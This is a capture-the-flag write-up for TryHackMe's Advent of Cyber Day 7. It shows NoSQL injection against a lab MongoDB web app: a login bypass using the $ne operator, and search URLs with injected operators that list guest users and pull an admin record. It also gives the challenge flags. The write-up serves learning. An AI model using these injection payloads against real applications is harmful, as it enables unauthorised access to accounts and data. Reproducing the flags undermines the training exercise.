> For the complete documentation index, see [llms.txt](https://repo.4pfsec.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://repo.4pfsec.com/tryhackme/advent-of-cyber-3-2021/day-7-migration-without-security.md).

# \[Day 7] Migration Without Security

Logging into the server with the given credentials, I was able to interact with the MongoDB and retrieve the first flag.

![](/files/hHpsdx8wpeDOM2ViIX1h)

{% hint style="success" %}
Interact with the MongoDB server to find the flag. What is the flag?

* THM{8814a5e6662a9763f7df23ee59d944f9}
  {% endhint %}

The following page is being served on port 80/HTTP

![](/files/kVWfKv0L8mEurYkLYVZw)

**Useful MongoDB Operators**

```
$eq - matches records that equal to a certain value

$ne - matches records that are not equal to a certain value

$gt - matches records that are greater than a certain value.

$where - matches records based on Javascript condition

$exists - matches records that have a certain field

$regex - matches records that satisfy certain regular expressions.
```

Bypassing the login page is as simple as using the `$ne` operator on the password field.

![](/files/LCMcPjsbK2MOXvFtdlQ8)

![](/files/NB5EFcv6Y4u9Yu1oPair)

![](/files/BaImW20JCWiNWCkUrwAu)

We're in.

![](/files/FK81UKKfgLBSHZHnaJGU)

{% hint style="success" %}
THM{b6b304f5d5834a4d089b570840b467a8}
{% endhint %}

```
10.10.121.120/search?username[$ne]=admin&role=guest
```

![](/files/tzipA6opkt6iTqskOVFr)

{% hint style="success" %}
Once you are logged in, use the gift search page to list all usernames that have guest roles. What is the flag?

* THM{2ec099f2d602cc4968c5267970be1326}<br>
  {% endhint %}

```
http://10.10.121.120/search?username=mcskidy&role[$ne]=guest
```

![](/files/Vsqq3KwWaKlT8gxIJpm8)

{% hint style="success" %}
Use the gift search page to perform NoSQL injection and retrieve the mcskidy record. What is the details record?

* ID:6184f516ef6da50433f100f4:mcskidy:admin
  {% endhint %}
